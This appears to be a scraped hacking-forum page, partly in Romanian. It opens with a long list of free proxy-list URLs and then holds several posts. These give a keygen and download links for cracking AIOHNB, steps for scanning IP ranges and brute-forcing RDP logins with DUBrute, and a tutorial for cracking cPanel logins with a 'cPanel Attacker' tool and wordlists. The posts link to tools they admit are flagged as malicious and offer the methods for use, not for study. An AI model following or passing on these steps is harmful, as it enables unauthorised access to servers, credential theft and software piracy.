http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=188#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=189#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=19#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=190#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=2#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=20#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=21#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=22#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=23#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=24#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=25#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=26#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=27#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=28#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=29#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=3#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=30#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=31#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=32#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=33#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=34#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=35#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=36#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=37#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=38#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=39#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=4#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=40#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=41#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=42#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=43#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=44#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=45#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=46#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=47#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=48#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=49#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=5#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=50#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=51#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=52#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=53#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=54#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=55#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=56#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=57#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=58#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=59#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=6#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=60#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=61#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=62#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=63#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=64#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=65#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=66#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=67#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=68#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=69#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=7#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=70#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=71#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=72#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=73#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=74#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=75#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=76#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=77#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=78#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=79#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=8#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=80#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=81#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=82#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=83#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=84#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=85#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=86#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=87#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=88#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=89#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=9#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=90#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=91#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=92#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=93#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=94#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=95#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=96#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=97#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=98#table http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=99#table http://www.xroxy.com/proxylist.php?port=&type=All_socks&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=0#table http://www.xroxy.com/proxylist.php?port=&type=All_socks&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=1#table http://www.xroxy.com/proxylist.php?port=&type=All_socks&ssl=&country=&latency=&reliability=&sort=reliability&desc=true&pnum=2#table http://www.xroxy.com/proxyrss.xml http://www.xroxy.com/rss/?uid=1&code=1234567890qwertyuiopasdfghjklzxc http://www.xroxy.com/xorum/forum-3.html|about http://www.xroxy.com/xorum/rss.php?c=5 http://www009.upp.so-net.ne.jp/redguy/temp/p2.htm https://socks5proxies.com/index.php?action=freeproxy https://socks5proxies.com/index.php?action=freescrapeboxproxies https://socks5proxies.com/index.php?page=10&action=freeproxy https://socks5proxies.com/index.php?page=10&action=freescrapeboxproxies https://socks5proxies.com/index.php?page=11&action=freeproxy https://socks5proxies.com/index.php?page=11&action=freescrapeboxproxies https://socks5proxies.com/index.php?page=12&action=freeproxy https://socks5proxies.com/index.php?page=12&action=freescrapeboxproxies https://socks5proxies.com/index.php?page=13&action=freeproxy https://socks5proxies.com/index.php?page=13&action=freescrapeboxproxies https://socks5proxies.com/index.php?page=14&action=freeproxy https://socks5proxies.com/index.php?page=15&action=freeproxy https://socks5proxies.com/index.php?page=16&action=freeproxy https://socks5proxies.com/index.php?page=17&action=freeproxy https://socks5proxies.com/index.php?page=18&action=freeproxy https://socks5proxies.com/index.php?page=19&action=freeproxy https://socks5proxies.com/index.php?page=2&action=freeproxy https://socks5proxies.com/index.php?page=2&action=freescrapeboxproxies https://socks5proxies.com/index.php?page=20&action=freeproxy https://socks5proxies.com/index.php?page=21&action=freeproxy https://socks5proxies.com/index.php?page=22&action=freeproxy https://socks5proxies.com/index.php?page=23&action=freeproxy https://socks5proxies.com/index.php?page=24&action=freeproxy https://socks5proxies.com/index.php?page=25&action=freeproxy https://socks5proxies.com/index.php?page=26&action=freeproxy https://socks5proxies.com/index.php?page=27&action=freeproxy https://socks5proxies.com/index.php?page=28&action=freeproxy https://socks5proxies.com/index.php?page=29&action=freeproxy https://socks5proxies.com/index.php?page=3&action=freeproxy https://socks5proxies.com/index.php?page=3&action=freescrapeboxproxies https://socks5proxies.com/index.php?page=30&action=freeproxy https://socks5proxies.com/index.php?page=31&action=freeproxy https://socks5proxies.com/index.php?page=32&action=freeproxy https://socks5proxies.com/index.php?page=33&action=freeproxy https://socks5proxies.com/index.php?page=34&action=freeproxy https://socks5proxies.com/index.php?page=35&action=freeproxy https://socks5proxies.com/index.php?page=36&action=freeproxy https://socks5proxies.com/index.php?page=37&action=freeproxy https://socks5proxies.com/index.php?page=38&action=freeproxy https://socks5proxies.com/index.php?page=39&action=freeproxy https://socks5proxies.com/index.php?page=4&action=freeproxy https://socks5proxies.com/index.php?page=4&action=freescrapeboxproxies https://socks5proxies.com/index.php?page=40&action=freeproxy https://socks5proxies.com/index.php?page=41&action=freeproxy https://socks5proxies.com/index.php?page=42&action=freeproxy https://socks5proxies.com/index.php?page=43&action=freeproxy https://socks5proxies.com/index.php?page=44&action=freeproxy https://socks5proxies.com/index.php?page=45&action=freeproxy https://socks5proxies.com/index.php?page=46&action=freeproxy https://socks5proxies.com/index.php?page=47&action=freeproxy https://socks5proxies.com/index.php?page=48&action=freeproxy https://socks5proxies.com/index.php?page=49&action=freeproxy https://socks5proxies.com/index.php?page=5&action=freeproxy https://socks5proxies.com/index.php?page=5&action=freescrapeboxproxies https://socks5proxies.com/index.php?page=50&action=freeproxy https://socks5proxies.com/index.php?page=6&action=freeproxy https://socks5proxies.com/index.php?page=6&action=freescrapeboxproxies https://socks5proxies.com/index.php?page=7&action=freeproxy https://socks5proxies.com/index.php?page=7&action=freescrapeboxproxies https://socks5proxies.com/index.php?page=8&action=freeproxy https://socks5proxies.com/index.php?page=8&action=freescrapeboxproxies https://socks5proxies.com/index.php?page=9&action=freeproxy https://socks5proxies.com/index.php?page=9&action=freescrapeboxproxies[/B]
-
How to use: 1.Open your aiohnb and click on brute force it asks for ok click ok. 2.now copy the serial code and put it keygen and click generate. 3.Now you get the reg code for your pc. 4.paste the reg code and hit register. 5.make sure no spaces in serial or key. Keygen: https://dl.dropboxusercontent.com/u/...ngfire.net.rar Aiohnb 2.2.6 32 bit: http://dl.dropbox.com/u/63742653/AIOHNB.rar AioHNB 2.2.6 64 bit: https://www.dropbox.com/s/n583yugh2rwgiqi/AIOHNB_64.7z Keygen is tested in 32 bit it works for 64 bit also. Scanati inainte de toate, nu ma fac responsabil.. folositiva si voi...
-
Facebook 200-1000 likes in 60 seconds! [FARA DESCARCARE ]
io.kent replied to io.kent's topic in Tutoriale in engleza
Carter, scrie hot, de meserie pe profilul meu ? dupa ce ca iti dau mura-n gura, mai si vi cu presupuneri.. -
E pe urmele lu BOTEZATU on: bine ai venit,
-
Some of this tools are DETECTED so use them with sandboxie or at your own risk Nu ma fac responsabil... First off all you need to get IP's,you can get them with programs VNC GUI Code: VNC is tool for getting ip in your range Code: http://www.mediafire.com/download/p0w7ypl56g3w3h9/vnc_gui.zip 1 . Scanning Code: # Select the Country you want # Click Get diap list # once the list is loaded , click start scan # After the scan is finished , click Start Parser # And your Ip list will be saved in IPs.txt 2.The second way to get IP's First download NMAP Here is link http://nmap.org/dist/nmap-5.51-setup.exe After you download install it Then download this Blah file Code: blah file.rar Code: This file is for getting ip with nmap /its private tool,but i can relese it,coded by someone When you open blah file(DONT FORGET TO INSTALL BEFOR THAT NMAP) You will get IP's file ,and will automatic save to file 3.The third way to get IP's You can download this program Remote Desktop Protocol IP Finder I have found this tool at http://*************.com/new-member-...ip-finder.html RDPSIF.rar code : http://www.mediafire.com/download/oxhx6nqkr9qrikx/RDPSIF.rar ############## BRUTING AND CRACKING RDP'S ############## Download DUBrute here Code: http://www.mediafire.com/download/uqzo70ow0g64110/DUBrute.rar Open Dubrute Code: # First Click Generation Code: # Click FileIp to impost your list of ip scanned # then put what usernames u want and passwords # Then Click Make # Then click Exit Code: # Click Config Code: # Select the number of threads , # Set according to ur needs and click Ok Click Start and you are ready to go!
-
yoyois esti sigur ca are mici sanse? contrazice-ma..
-
Facebook 200-1000 likes in 60 seconds! [FARA DESCARCARE ]
io.kent replied to io.kent's topic in Tutoriale in engleza
Daca nu intelegeti ceva lasa-ti aici intrebarile.. -
Today i will teach you how to crack Cpanel.The tutorial is really easy so i will mostly talk some useless text in here to make the thread a bit longer.The thread will be short and wont take alot time.I personally don't like cracking at all.One reason is that it takes alot of time and second reason is that in cracking you don't have to do anything and think alot instead of hacking.That's another tutorial where you run a tool and it will do the work for you. For those who doesn't know, Cpanel looks like this. Now let's start with the tutorial 1)Download the tool : http://www.mediafire.com/download/aagkpn5xx3f0fxf/cPanel+Attacker.rar scanati inainte de toate.. 2)Open up the tool and on the Hosts tab write the websites name what you want to crack. 3)choose the port. 4)Write the administrator name to the "user" tab. 5)Upload some wordlist.txt or leave it and use default one Smiling 6)Press the "Start" button. Look the tool's picture below Now the tool will start cracking.The valid usernames and passwords will appear at the "Results" box.Another cracking thread where you have to run a tool Bafta !!